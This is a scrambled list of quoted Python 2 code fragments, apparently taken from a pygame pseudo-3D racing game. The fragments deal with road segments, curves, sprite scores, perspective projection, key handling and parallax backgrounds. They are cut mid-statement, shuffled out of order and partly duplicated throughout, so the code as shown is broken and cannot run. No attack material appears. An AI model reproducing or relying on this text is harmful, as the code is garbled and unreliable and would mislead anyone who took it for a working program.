116", "self.yp_to_ys(yp3, self.h) ys4 = ys3 #''' #if 1: #if i", "self.player_x - curve_d * i # <3> xx1 = rad1", "if sk not in ['obj']: spr_n[sk] = sv else: spr_n[sk]", "5, 'y': 5, 'w': 1280, 'h': 480 }, 'SKY': {", "c, pnts) except Exception as e: #print '-' * 60", "= self.road.position / self.road.track_len self.prog.progress(prg) spdc = self.road.speed / self.road.speed_max", "for obj in self.rd_sprt_cache[::-1]: self.disp_add(obj) def render_polygon(self, ctx, x1, y1,", "return i def rd_get_segs(self, whole=False): if whole: segs = self.segments", "def update_world(self): if self.player_go == 1: self.speed += self.speed_dt_up elif", "- 1]['p2']['world'].get('y', 0.0) def rd_seg_init_rand(self, n=50): #print 'rd_seg_init_rand', n for", "self.speed += self.speed_dt_up elif self.player_go == 2: self.speed -= self.speed_dt_dn", "a3c train self.rd_start_seg_init() self.rd_sprts_init_rand() def draw_on(self, *args, **kwargs): self.fill(self.clr_dark_grass) def", "#print 'world y', self.player_seg['p1']['world'].get('y', 0.0) # clear the sprites cache", "seg_n #print si seg = self.segments[si] #''' ''' #x# if", "self.bg_sky2.rect.top = 0 self.bg_sky2.rect.left = self.bg_sky1.rect.width 
self.disp_add(self.bg_sky2) self.bg_hills1 = FPSptBg('img_flatpath/images/background.png',", "curve=0.0, yw=0.0): #print '+', curve, yw n = len(self.segments) #print", "/ 2 - self.player_x - curve_d * i #xc2 =", "= -self.road_w / 2 - self.player_x # <3> #engi =", "i < 10: print '>>> ', i print 'curve', seg.get('curve',", "= pygm.SptLbl(str(int(self.road.speed)), c=consts.GREEN, font_size=12) self.rdpsd.rect.top = 456 self.rdpsd.rect.left = 312", "self.rdpsd.rect.top = 456 self.rdpsd.rect.left = 312 self.disp_add(self.rdpsd) self.scr = pygm.SptLbl(str(int(self.road.score)),", "info['obj'] = obj ##self.disp_add(obj) # NOTE: render out here self.rd_sprt_objs[obj_k]", "self.lane_w xcl4 = xc4 + self.lane_w xcr1 = xcr1 -", "#self.seg_draw_n = 200#150 self.seg_draw_n = 70#100#200#150 self.speed = 0.0 self.position", "k == self.pglc.K_LEFT: return 3 else: return None def key_to_di_b(self,", "self.render_polygon(None, xs2, ys2, xsl2, ys2, xsl4, ys4, xs4, ys4, seg['color']['rumble'])", "= 40#454 self.scr.rect.left = 600 self.disp_add(self.scr) self.tm_once = pygm.SptLbl(str(int(self.road.tm_last_once)), c=consts.YELLOW,", "', i print 'curve', seg.get('curve', 0.0) print 'world z', seg['p1']['world']['z']", "c, cpnts) self.pygm.draw.lines(self.surf, c, False, cpnts, 3) class FPSptProgress(sptdraw.SptDrawBase): def", "FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['CURVE']['MEDIUM']) self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['CURVE']['EASY']) self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], -FP_ROAD['CURVE']['EASY'])", "'chick_fly': {'imgs': ['img_sprts/chick_fly3.png'], 'score': 70,}, 'clown': {'imgs': ['img_sprts/clown1.png'], 'score': -100,},", "class FPSptBg(pygm.SptImgOne): def __init__(self, img_file, pos, *args, **kwargs): super(FPSptBg, self).__init__(img_file,", "the grass, slow down if self.player_x < -self.road_w / 2", "segs, rad): pnts = self.get_segs_pnts(segs, rad) #print pnts if len(pnts)", "self.pglc.K_SPACE or k == self.pglc.K_v or k == self.pglc.K_n: return", "332 }, 'BILLBOARD09': { 'x': 150, 'y': 555, 'w': 328,", "hold + leave for n in range(enter): self.rd_seg_add(self.util_ease_in(0, curve, float(n)/enter),", "- self.player_x #xc3 = self.road_w / 2 - self.player_x #xc4", "self.player_go = 0 if 2 in e_keys_up: if self.player_go !=", "self.camera_x = 0.0 self.camera_y = 0.0 self.camera_z = 500.0#1000.0#0.0 ==", "pass def rd_sprts_render(self, seg, x_pos, x_i, y, scale): sprts =", "road TODO: * hill road * more road sprites *", "ys3) / 2.0 x_dt = x_rnd * seg_scale x_pos =", "zc): if zc == 0.0: #yp = float('inf') #yp =", "event.type == self.pglc.KEYUP: k = event.key if k == self.pglc.K_SPACE:", "'h': 118 }, 'BUSH2': { 'x': 255, 'y': 1097, 'w':", "- self.position zc2 = zw2 - self.camera_z - self.position #", "def road_reset_keep_segs(self): self.road.rd_reset(init=False, keep_segs=True) def road_reset_from_file(self, segs_file='sr_roads/sr_road.txt'): segs_file = utils.dir_abs(segs_file,", "'score': -50,}, 'blobb': {'imgs': ['img_sprts/blobb1.png'], 'score': -50,}, 'chick_fly': {'imgs': ['img_sprts/chick_fly3.png'],", "return a + (b - a) * ((-math.cos(percent * math.pi)/2)", "sprites cache self.rd_sprt_cache = [] # <1> #for i, seg", "self.last_seg_i = 0 self.score = 0 self.game_over = False self.game_score", "'#00EEEE' FP_COLORS = { 'SKY': '#72D7EE', 'TREE': '#005108', 'FOG': '#005108',", "< -1.0: a = -1.0 elif a > 1.0: a", "rad): a = float(curve) / rad #a *= 10.0 #print", 
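
# FPStraight above keeps two copies of each background strip side by side, and
# FPSptRoadB.update_bg() scrolls them at different rates (sky 0.1, hills 0.2,
# trees 0.3 of the curve-induced shift), wrapping whichever copy leaves the
# window. That wrap rule, reduced to one function:
def _demo_parallax_wrap(left, width, dx):
    left += dx
    if left + width < 0:
        left += width * 2
    if left - width > 0:
        left -= width * 2
    return left

# e.g. a 1280-wide strip at left=-1300 shifted by -50 wraps back into view:
# _demo_parallax_wrap(-1300, 1280, -50) == 1210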
"'y': yw}, 'camera': {}, 'screen': {}}, 'curve': curve, 'color': c,", "# reflect the y- d = 116 pnts = [[x1,", "= self.player_seg.get('curve', 0.0) #p_curve = 3 #print 'p_curve', p_curve p_dt", "self.position > self.track_len: self.position -= self.track_len # for check score", "zc1) x_rnd = random.randint(1, self.road_w / 2 - 10) *", "['img_sprts/i_pot1.png'], 'score': -5,}, 'pot2': {'imgs': ['img_sprts/i_pot2.png'], 'score': -1,}, 'shell': {'imgs':", "* 2 if hill.rect.left - hill.rect.width > 0: hill.rect.left -=", "if not sprts: return None for i, info in enumerate(sprts):", "= seg['p1']['world'].get('y', 0.0) yw2 = seg['p2']['world'].get('y', 0.0) yc1 = yc", "after road #self.road = FPSptRoad((640, 240), self.cfg) self.road = FPSptRoadB((640,", "self.bg_hills1 = FPSptBg('img_flatpath/images/background.png', IMG_POS_BACKGROUND['HILLS']) self.bg_hills1.rect.top = 0 self.bg_hills1.rect.left = 0", "#self.base_seg['color'] = FP_COLORS['FINISH'] b_curve = self.player_seg.get('curve', 0.0) #b_percent = 0.5", "'h': 78 }, 'CAR03': { 'x': 1383, 'y': 760, 'w':", "'TREE': '#005108', 'FOG': '#005108', 'LIGHT': {'road': '#6B6B6B', 'grass': '#10AA10', 'rumble':", "if (car_x - w_half) < sprt_at < (car_x + w_half):", "0, 'EASY': 2, 'MEDIUM': 4, 'HARD': 6 }, 'HILL': {'NONE':", "10) * seg_scale #x_sprt = (xs1 + xs2) / 2.0", "{ 'x': 995, 'y': 5, 'w': 200, 'h': 315 },", "c=[0, 81, 8, 0], h=30, *args, **kwargs): super(FPSptFog, self).__init__(size) self.c", "**kwargs): return events def refresh(self, fps_clock, *args, **kwargs): pass class", "'y': 1018, 'w': 80, 'h': 45 }, 'PLAYER_UPHILL_RIGHT': { 'x':", "#'dinof': {'imgs': ['img_sprts/dinof2.png'], 'score': -50,}, 'blobb': {'imgs': ['img_sprts/blobb1.png'], 'score': -50,},", "<1> zw1 = seg['p1']['world']['z'] zw2 = seg['p2']['world']['z'] zc1 = zw1", "sk not in ['obj']: spr_n[sk] = sv else: spr_n[sk] =", "+ (b - a) * math.pow(percent, 2) def util_ease_out(self, a,", "self.xc_to_xp(xcr3, self.d, zc2) xsr3 = self.xp_to_xs(xpr3, self.w) xpr4 = self.xc_to_xp(xcr4,", "-self.road_w / 2 - self.player_x #xcl1 = xc1 - self.lane_w", "#print 'self.position', self.position # <2> seg_n = len(self.segments) segbi =", "a) * (1 - math.pow(1 - percent, 2)) def util_ease_in_out(self,", "xcl4 = xc4 + self.lane_w xcr1 = xcr1 - x_curve", "self.straight.rect.top = 0 self.straight.rect.left = 0 self.disp_add(self.straight) '''' self.sn1 =", "{'road': FP_COLOR_BLACK, 'grass': FP_COLOR_BLACK, 'rumble': FP_COLOR_BLACK}, 'START_Y': {'road': FP_COLOR_YELLOW, 'grass':", "d-y1]] c = utils.clr_from_str(color) try: self.pygm.draw.polygon(self.surf, c, pnts) except Exception", "segs_file is not None: try: segs = self.rd_seg_json_load(segs_file) self.segments =", "self.w) yp1 = self.yc_to_yp(yc1, self.d, zc1) ys1 = self.yp_to_ys(yp1, self.h)", "delete all # NOTE: only show one break return obj", "if di is not None: e_keys_dn.append(di) else: r_events.append(event) else: r_events.append(event)", "if 1 in e_keys_up: if self.player_di != 3: self.player_di =", "- car_w / 2), sprt_at, (car_x + car_w / 2)", "self.pglc.K_BACKSPACE: self.road_reset_from_file() elif k == self.pglc.K_SLASH: self.road_segs_to_file() else: r_events.append(event) elif", "- self.player_x #xc2 = -self.road_w / 2 - self.player_x #xc3", "* 2 for hill in self.bg_hills: hill.rect.left += int(self.hill_speed *", "#p_dt = -40 #p_dt = random.randint(-100, 100) #print p_dt for", "(car_x + car_w / 2) #print '-' * 40 w_half", "= { 'chest': {'imgs': ['img_sprts/i_chest1.png'], 'score': 100,}, 'coin1': {'imgs': 
FP_ROAD = {
    'LENGTH': {'NONE': 0, 'SHORT': 25, 'MEDIUM': 50, 'LONG': 100},  # num segments
    'CURVE': {'NONE': 0, 'EASY': 2, 'MEDIUM': 4, 'HARD': 6},
    'HILL': {'NONE': 0, 'LOW': 20, 'MEDIUM': 40, 'HIGH': 60},
}

FP_ROAD_SPRTS = {
    'chest': {'imgs': ['img_sprts/i_chest1.png'], 'score': 100,},
    'coin1': {'imgs': ['img_sprts/i_coin1.png'], 'score': 1,},
    'coin5': {'imgs': ['img_sprts/i_coin5.png'], 'score': 5,},
    'coin20': {'imgs': ['img_sprts/i_coin20.png'], 'score': 20,},
    # (one more coin-type entry with score 10; its name was not recovered)
    'heart': {'imgs': ['img_sprts/i_heart.png'], 'score': 50,},
    'pot1': {'imgs': ['img_sprts/i_pot1.png'], 'score': -5,},
    'pot2': {'imgs': ['img_sprts/i_pot2.png'], 'score': -1,},
    'shell': {'imgs': ['img_sprts/p_shell.png'], 'score': -20,},
    'rockd': {'imgs': ['img_sprts/rock_d2.png'], 'score': -10,},
    'rockr': {'imgs': ['img_sprts/rock_r2.png'], 'score': -50,},
    #'ashra_defeat': {'imgs': ['img_sprts/ashra_defeat1.png'], 'score': -100,},
    #'bear': {'imgs': ['img_sprts/bear2.png'], 'score': -80,},
    #'dinof': {'imgs': ['img_sprts/dinof2.png'], 'score': -50,},
    'blobb': {'imgs': ['img_sprts/blobb1.png'], 'score': -50,},
    'chick_fly': {'imgs': ['img_sprts/chick_fly3.png'], 'score': 70,},
    'clown': {'imgs': ['img_sprts/clown1.png'], 'score': -100,},
}


class SptTmpx(sptdraw.SptDrawBase):
    def __init__(self, size, *args, **kwargs):
        super(SptTmpx, self).__init__(size)
        self.draw_on()

    def draw_on(self, *args, **kwargs):
        self.pygm.draw.circle(self.surf, consts.WHITE,
                              (self.size[0] / 2, self.size[1] / 2),
                              self.size[0] / 2, 0)


class SptTmpi(pygm.SptImg):
    def __init__(self, img_file, *args, **kwargs):
        super(SptTmpi, self).__init__(img_file)


class FPSptBg(pygm.SptImgOne):
    def __init__(self, img_file, pos, *args, **kwargs):
        super(FPSptBg, self).__init__(img_file, pos)


class FPSptSprts(pygm.SptImgOne):
    def __init__(self, img_file, pos, *args, **kwargs):
        super(FPSptSprts, self).__init__(img_file, pos)


class FPSptFog(sptdraw.SptDrawBase):
    def __init__(self, size, c=[0, 81, 8, 0], h=30, *args, **kwargs):
        super(FPSptFog, self).__init__(size)
        self.c = c
        self.h = h
        self.draw_on()

    def draw_on(self, *args, **kwargs):
        # a stack of thin strips whose alpha fades out toward the bottom
        d = 2
        n = self.h / d
        for i in range(n):
            rct = [0, i * d, self.size[0], d]
            #ca = 255 / n * (n - i)
            ca = 200 / n * (n - i)
            self.c[3] = ca
            self.pygm.draw.rect(self.surf, self.c, rct)


class FPSptRdSprts(pygm.SptImg):
    def __init__(self, img_file, *args, **kwargs):
        super(FPSptRdSprts, self).__init__(img_file)

    @classmethod
    def create_by_img(cls, img):
        return cls(img)
        # for test
        #o = SptTmpx((40, 40))
        #return o
class FPSptRoadB(sptdraw.SptDrawBase):
    def __init__(self, size, cfg, *args, **kwargs):
        super(FPSptRoadB, self).__init__(size)
        self.cfg = cfg
        self.car = kwargs.get('car')
        self.bg_sky = kwargs.get('bg_sky')
        self.bg_hills = kwargs.get('bg_hills')
        self.w = size[0]  # assumed: screen width/height used by xp_to_xs/yp_to_ys
        self.h = size[1]
        self.clr_dark_grass = utils.clr_from_str(FP_COLORS['DARK']['grass'])
        self.rd_reset(init=True)
        self.add_fog()

    def prms_reset(self, keep_segs=False):
        self.e_keys_up = []
        self.e_keys_dn = []
        self.flag_check_event = True  # assumed default; handle_event() reads it
        if not keep_segs:
            self.segments = []
            self.rd_sprt_objs = {}
            self.rd_sprt_cache = []  # for sprites render order
        self.track_len = 0.0
        self.seg_len = 200.0  #100.0#20.0#60.0#
        self.road_w = 2400  #2000#600.0#200.0#1000.0#
        self.camera_h = 500.0  #1000.0#
        self.speed_max = 300.0  #180.0#200.0#100.0
        self.lane_w = 60
        self.seg_n = 300  #200
        self.seg_draw_n = 70  #100#200#150
        self.speed = 0.0
        self.position = 0.0
        self.player_x = 0.0  #100.0#1000.0#
        self.player_di = 0  # 0 straight, 1 right, 3 left (see key_to_di)
        self.player_go = 0  # 0 coast, 1 accelerate, 2 brake
        self.centrifugal = 0.1  #0.06#0.08#0.01#0.3
        self.player_seg = None
        self.base_seg = None  # the segment just under the car
        self.camera_x = 0.0
        self.camera_y = 0.0
        self.camera_z = 500.0  #1000.0#0.0 == self.camera_h
        # world / camera / projection / screen coords
        self.xw = 0.0
        self.yw = 0.0
        self.zw = 0.0
        self.xc = 0.0
        self.yc = 0.0
        self.zc = 0.0
        self.xp = 0.0
        self.yp = 0.0
        self.xs = 0.0
        self.ys = 0.0
        self.d = 1.0  # projection-plane distance; exact source value not recovered
        self.speed_dt_up = 1.0  #2.0#3.0 (attribute name assumed)
        self.speed_dt_dn = 2.0  #4.0#6.0
        self.speed_dt_na = 1.0  #3.0
        self.player_x_dt = 60.0  #30.0#20.0
        self.last_seg_i = 0
        self.score = 0
        self.game_over = False
        self.game_score = 0.0
        self.tm_start = 0.0
        self.tm_end = 0.0
        self.tm_last_once = 0.0
        self.sky_speed = 0.3  #0.15#
        self.hill_speed = 0.3  # assumed same as sky_speed; split not recovered

    def rd_reset(self, init=False, keep_segs=False, segs_file=None):
        if not init:
            self.rd_sprts_del_all_objs()
        self.prms_reset(keep_segs=keep_segs)
        if segs_file is not None:
            try:
                segs = self.rd_seg_json_load(segs_file)
                self.segments = segs
                self.track_len = len(self.segments) * self.seg_len
            except Exception as e:
                print e
                self.init_rd_segs_rand_1()
        else:
            if not keep_segs:
                self.init_rd_segs_rand_1()
        self.draw_on()
        self.rd_seg_render()

    def init_rd_segs_rand_1(self):
        #self.rd_seg_init(self.seg_n)
        #self.rd_seg_init(self.seg_draw_n)
        #self.rd_seg_init(100)#20#500#2#10#4#1#100#200
        #self.rd_seg_init(random.randint(30, 100))
        self.rd_seg_init(random.randint(1, 10))  # for a3c train
        segnrand = random.randint(1, 6)  # lower bound assumed; only the 6 was recovered
        self.rd_seg_init_rand(segnrand)  # for segment draw
        self.rd_start_seg_init()
        self.rd_sprts_init_rand()

    def draw_on(self, *args, **kwargs):
        self.fill(self.clr_dark_grass)

    def add_fog(self):
        self.fog = FPSptFog(self.size)
        self.fog.rect.top = 240
        self.fog.rect.left = 0
        self.disp_add(self.fog)
    def seg_lasy_y(self):
        seg_n = len(self.segments)
        if seg_n == 0:
            return 0.0
        else:
            return self.segments[seg_n - 1]['p2']['world'].get('y', 0.0)

    def rd_seg_init(self, a=500):
        for n in range(a):
            self.rd_seg_add(0.0, 0.0)

    def rd_seg_add(self, curve=0.0, yw=0.0):
        n = len(self.segments)
        if n % 2 == 0:
            #if n % 4 == 0:
            c = FP_COLORS['LIGHT']
            #c = {'road': FP_COLOR_WHITE}
        else:
            c = FP_COLORS['DARK']
            #c = {'road': FP_COLOR_BLACK}
        seg = {
            'index': n,
            'p1': {'world': {'z': (n + 1) * self.seg_len, 'y': self.seg_lasy_y()},
                   'camera': {}, 'screen': {}},
            'p2': {'world': {'z': (n + 2) * self.seg_len, 'y': yw},
                   'camera': {}, 'screen': {}},
            'curve': curve,
            'color': c,
            'sprites': [],
            'looped': 0,
        }
        self.segments.append(seg)
        self.track_len = len(self.segments) * self.seg_len
        #self.track_len = (len(self.segments) - self.seg_draw_n) * self.seg_len

    def rd_seg_init_rand(self, n=5):
        #print 'rd_seg_init_rand', n
        for i in range(n):
            p = random.random()
            rl = random.choice([1, -1])
            if p < 0.35:
                # curve grade for this branch assumed MEDIUM
                self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'],
                              FP_ROAD['LENGTH']['MEDIUM'], rl * FP_ROAD['CURVE']['MEDIUM'])
            elif p < 0.7:
                self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'],
                              FP_ROAD['LENGTH']['MEDIUM'], rl * FP_ROAD['CURVE']['EASY'])
            #elif p < 0.8:
            #    curve = 0.0
            #    yw = random.random() * 10.0
            else:
                enter = random.randint(10, 40)
                hold = random.randint(10, 40)
                leave = random.randint(10, 40)
                curve = rl * random.random() * 8.0
                yw = 0.0
                self.add_road(enter, hold, leave, curve, yw)

    def rd_seg_init_rand_curve(self, n=5):
        #print 'rd_seg_init_rand', n
        for i in range(n):
            rl = random.choice([1, -1])
            enter = random.randint(10, 40)
            hold = random.randint(10, 40)
            leave = random.randint(10, 40)
            curve = rl * random.random() * 6.0
            yw = 0.0
            self.add_road(enter, hold, leave, curve, yw)

    def rd_start_seg_init(self, n=2):  # default n assumed
        seg_n = len(self.segments)
        if seg_n == 0:
            return
        #self.segments[0]['color'] = FP_COLORS['START_Y']
        #self.segments[2]['color'] = FP_COLORS['START_Y']
        for i in range(n):
            self.segments[i]['color'] = FP_COLORS['START_Y']

    def add_road(self, enter, hold, leave, curve, yw=0.0):
        start_y = self.seg_lasy_y()
        end_y = start_y + (int(yw) * self.seg_len)
        total = enter + hold + leave
        for n in range(enter):
            self.rd_seg_add(self.util_ease_in(0, curve, float(n)/enter),
                            self.util_ease_out(start_y, end_y, float(n)/total))
        for n in range(hold):
            self.rd_seg_add(curve,
                            self.util_ease_out(start_y, end_y, (float(n)+enter)/total))
        for n in range(leave):
            # float() added: n/leave was integer division in the original
            self.rd_seg_add(self.util_ease_out(curve, 0, float(n)/leave),
                            self.util_ease_out(start_y, end_y, (float(n)+enter+hold)/total))

    def add_curves(self):
        self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'],
                      FP_ROAD['LENGTH']['MEDIUM'], -FP_ROAD['CURVE']['EASY'])
        self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'],
                      FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['CURVE']['MEDIUM'])
        self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'],
                      FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['CURVE']['EASY'])
        self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'],
                      FP_ROAD['LENGTH']['MEDIUM'], -FP_ROAD['CURVE']['EASY'])
        self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'],
                      FP_ROAD['LENGTH']['MEDIUM'], -FP_ROAD['CURVE']['MEDIUM'])
        self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'],
                      FP_ROAD['LENGTH']['MEDIUM'], 0.0)

    def add_low_rolling_hills(self, num, height):
        # the original wrote ROAD[...] here, a NameError; FP_ROAD is meant
        num = num or FP_ROAD['LENGTH']['SHORT']
        height = height or FP_ROAD['HILL']['LOW']
        self.add_road(num, num, num, 0, height/2.0)
        self.add_road(num, num, num, 0, -height/2.0)
        self.add_road(num, num, num, 0, height)
        self.add_road(num, num, num, 0, 0)
        self.add_road(num, num, num, 0, height/2.0)
        self.add_road(num, num, num, 0, 0)
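    # A worked sketch (not in the original file) of the curve profile that
    # add_road() produces: util_ease_in shapes the 'enter' ramp and
    # util_ease_out the 'leave' ramp (both defined further below).
    # For enter=4, hold=2, leave=4, curve=6.0 the per-segment curve values are:
    #
    #   enter : 6.0 * (n/4.0)**2       -> 0.0, 0.375, 1.5, 3.375
    #   hold  : curve                  -> 6.0, 6.0
    #   leave : 6.0 * (1 - n/4.0)**2   -> 6.0, 3.375, 1.5, 0.375
    #
    # so the road bends in smoothly, holds the bend, then straightens out.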
    def get_seg_base_i(self, pos=None):
        if pos is None:
            pos = self.position
        i = int(pos / self.seg_len)
        #i = int(utils.math_round(pos / self.seg_len))
        #i = int(math.floor(pos / self.seg_len))
        #i = int(math.ceil(pos / self.seg_len))
        seg_n = len(self.segments)
        i = (i + seg_n) % seg_n
        return i

    def rd_get_segs(self, whole=False):
        if whole:
            segs = self.segments
        else:
            segs = self.segments[:-self.seg_draw_n]
        return segs

    # #### geometry ####

    def geo_prjc_scale(self, d, zc):
        if zc == 0.0:
            return 1.0
        else:
            return d / zc

    def xc_to_xp(self, xc, d, zc):
        if zc == 0.0:
            #xp = float('inf')
            xp = xc  # zc == 0 fallback assumed; the source line was not recovered
        else:
            xp = xc * (d / zc)
        return xp

    def yc_to_yp(self, yc, d, zc):
        if zc == 0.0:
            #yp = float('inf')
            yp = yc  # as above
        else:
            yp = yc * (d / zc)
        return yp

    def xp_to_xs(self, xp, w):
        xs = w / 2.0 + xp
        return xs

    def yp_to_ys(self, yp, h):
        #ys = h / 2.0 - h / 2.0 * yp
        ys = h / 2.0 - yp
        return ys
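    # A quick numeric check (illustrative only) of the camera->screen pipeline
    # above, assuming d=1.0 and a 640x480 view:
    #
    #   xc, yc, zc = 1200.0, -500.0, 1200.0   # camera-space point
    #   xp = xc * (d / zc)                    # = 1.0
    #   yp = yc * (d / zc)                    # = -0.4166...
    #   xs = 640 / 2.0 + xp                   # = 321.0 (just right of centre)
    #   ys = 480 / 2.0 - yp                   # = 240.4166... (just below centre)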
    def rd_sprts_init_rand(self):
        seg_n = len(self.segments)
        #n = seg_n / 20
        n = seg_n / random.randint(10, 30)
        for i in range(n):
            # target segment chosen at random; exact selection not recovered
            j = random.randint(0, seg_n - 1)
            sprt = random.choice(FP_ROAD_SPRTS.keys())
            s = {
                'name': sprt,
                'type': 1,  # image / animate / ...
                'obj': None,  # need to create at render
                # get real (random) x from x_pos
                'x_i': random.randint(0, 4),
                'score': FP_ROAD_SPRTS[sprt].get('score', 0),
            }
            self.segments[j]['sprites'].append(s)

    def rd_sprts_del_all_objs(self):
        for k, sprt in self.rd_sprt_objs.items():
            #print k, sprt
            self.disp_del(sprt)
            del self.rd_sprt_objs[k]

    def rd_sprts_render(self, seg, x_pos, x_i, y, scale):
        sprts = seg.get('sprites')
        if not sprts:
            return None
        obj = None
        for i, info in enumerate(sprts):
            sprt = info['name']
            obj_k = str(seg['index']) + '_' + str(i) + '_' + sprt
            obj = info.get('obj')
            if obj:
                self.disp_del(obj)
                # NOTE: objs will be deleted at rd_sprts_del_all_objs()
                ##del self.rd_sprt_objs[obj_k]
            img = FP_ROAD_SPRTS[sprt]['imgs'][0]
            obj = FPSptRdSprts.create_by_img(img)
            # avoid: pygame.error: Width or height is too large
            if scale > 500:
                #print 'scale <1>', scale
                pass
            else:
                try:
                    obj.scale(scale)
                except:
                    #print 'scale <2>', scale
                    pass
            x_i_saved = info.get('x_i')
            #if not x_i_saved:
            #    info['x_i'] = x_i
            #    x_i_saved = x_i
            obj.rect.top = 116 - y + 240 - obj.rect.height
            obj.rect.left = x_pos[x_i_saved] - obj.rect.width / 2  # centring assumed
            info['obj'] = obj
            ##self.disp_add(obj)  # NOTE: render out here
            self.rd_sprt_objs[obj_k] = obj
            # for sprites render order
            self.rd_sprt_cache.append(obj)
            # NOTE: only show one
            break
        return obj
    def rd_seg_render(self):
        """curve"""
        # clear the sprites of the last render
        self.rd_sprts_del_all_objs()
        # sprites cache
        self.rd_sprt_cache = []
        seg_n = len(self.segments)
        segbi = self.get_seg_base_i()
        #print 'segbi', segbi
        self.player_seg = self.segments[segbi]
        self.base_seg = self.segments[(segbi + 2) % seg_n]
        # for test
        #self.base_seg['color'] = FP_COLORS['FINISH']
        b_curve = self.player_seg.get('curve', 0.0)
        #b_percent = 0.5
        b_percent = self.util_curve_percent_remaining(self.position, self.seg_len)
        dx_curve = -(b_curve * b_percent)
        x_curve = 0
        #print 'b_curve', b_curve
        #print 'world z', self.player_seg['p1']['world']['z']
        #print 'world y', self.player_seg['p1']['world'].get('y', 0.0)
        for i in range(self.seg_draw_n):
            si = (segbi + i) % seg_n
            seg = self.segments[si]
            zw1 = (i+1)*self.seg_len
            zw2 = (i+2)*self.seg_len
            zc1 = zw1 - self.camera_z - (self.position % self.seg_len)
            zc2 = zw2 - self.camera_z - (self.position % self.seg_len)
            # for hills
            yw1 = seg['p1']['world'].get('y', 0.0)
            yw2 = seg['p2']['world'].get('y', 0.0)
            yc = self.camera_h
            yc1 = yc - yw1
            yc2 = yc - yw2
            # road edges (p1 right/left, p2 right/left), shifted by the player
            xc1 = self.road_w / 2 - self.player_x
            xc2 = -self.road_w / 2 - self.player_x
            xc3 = self.road_w / 2 - self.player_x
            xc4 = -self.road_w / 2 - self.player_x
            # accumulated curve offset: p1 by x_curve, p2 by x_curve + dx_curve
            xc1 = xc1 - x_curve
            xc2 = xc2 - x_curve
            xc3 = xc3 - x_curve - dx_curve
            xc4 = xc4 - x_curve - dx_curve
            # rumble strips and centre lane
            xcl1 = xc1 - self.lane_w
            xcl2 = xc2 + self.lane_w
            xcl3 = xc3 - self.lane_w
            xcl4 = xc4 + self.lane_w
            xcr1 = self.lane_w - self.player_x
            xcr2 = -self.lane_w - self.player_x
            xcr3 = self.lane_w - self.player_x
            xcr4 = -self.lane_w - self.player_x
            xcr1 = xcr1 - x_curve
            xcr2 = xcr2 - x_curve
            xcr3 = xcr3 - x_curve - dx_curve
            xcr4 = xcr4 - x_curve - dx_curve
            x_curve = x_curve + dx_curve
            dx_curve = dx_curve + seg.get('curve', 0.0)
            # project to screen
            xp1 = self.xc_to_xp(xc1, self.d, zc1)
            xs1 = self.xp_to_xs(xp1, self.w)
            xp2 = self.xc_to_xp(xc2, self.d, zc1)
            xs2 = self.xp_to_xs(xp2, self.w)
            xp3 = self.xc_to_xp(xc3, self.d, zc2)
            xs3 = self.xp_to_xs(xp3, self.w)
            xp4 = self.xc_to_xp(xc4, self.d, zc2)
            xs4 = self.xp_to_xs(xp4, self.w)
            yp1 = self.yc_to_yp(yc1, self.d, zc1)
            ys1 = self.yp_to_ys(yp1, self.h)
            ys2 = ys1
            yp3 = self.yc_to_yp(yc2, self.d, zc2)
            ys3 = self.yp_to_ys(yp3, self.h)
            ys4 = ys3
            # grass
            self.render_polygon(None, 0, ys1, self.w, ys2,
                                self.w, ys4, 0, ys3, seg['color']['grass'])
            # road
            self.render_polygon(None, xs1, ys1, xs2, ys2,
                                xs4, ys4, xs3, ys3, seg['color']['road'])
            if 1:  #i % 2 == 1:
                xpl1 = self.xc_to_xp(xcl1, self.d, zc1)
                xsl1 = self.xp_to_xs(xpl1, self.w)
                xpl2 = self.xc_to_xp(xcl2, self.d, zc1)
                xsl2 = self.xp_to_xs(xpl2, self.w)
                xpl3 = self.xc_to_xp(xcl3, self.d, zc2)
                xsl3 = self.xp_to_xs(xpl3, self.w)
                xpl4 = self.xc_to_xp(xcl4, self.d, zc2)
                xsl4 = self.xp_to_xs(xpl4, self.w)
                self.render_polygon(None, xs1, ys1, xsl1, ys1,
                                    xsl3, ys3, xs3, ys3, seg['color']['rumble'])
                self.render_polygon(None, xs2, ys2, xsl2, ys2,
                                    xsl4, ys4, xs4, ys4, seg['color']['rumble'])
                xpr1 = self.xc_to_xp(xcr1, self.d, zc1)
                xsr1 = self.xp_to_xs(xpr1, self.w)
                xpr2 = self.xc_to_xp(xcr2, self.d, zc1)
                xsr2 = self.xp_to_xs(xpr2, self.w)
                xpr3 = self.xc_to_xp(xcr3, self.d, zc2)
                xsr3 = self.xp_to_xs(xpr3, self.w)
                xpr4 = self.xc_to_xp(xcr4, self.d, zc2)
                xsr4 = self.xp_to_xs(xpr4, self.w)
                self.render_polygon(None, xsr1, ys1, xsr2, ys2,
                                    xsr4, ys4, xsr3, ys3, seg['color']['rumble'])
            # render road sprites
            # TODO: check if this seg is looped
            seg_scale = self.geo_prjc_scale(self.d, zc1)
            x_rnd = random.randint(1, self.road_w / 2 - 10) * seg_scale
            #x_sprt = (xs1 + xs2) / 2.0
            #y_sprt = (ys1 + ys3) / 2.0
            x_dt = x_rnd * seg_scale
            #x_sprt = xsr1
            x_sprt = (xsr1 + xsl1) / 2.0
            # candidate x slots, indexed by the sprite's 'x_i'
            x_pos = [x_sprt - x_dt, x_sprt + x_dt,  # leading slots assumed
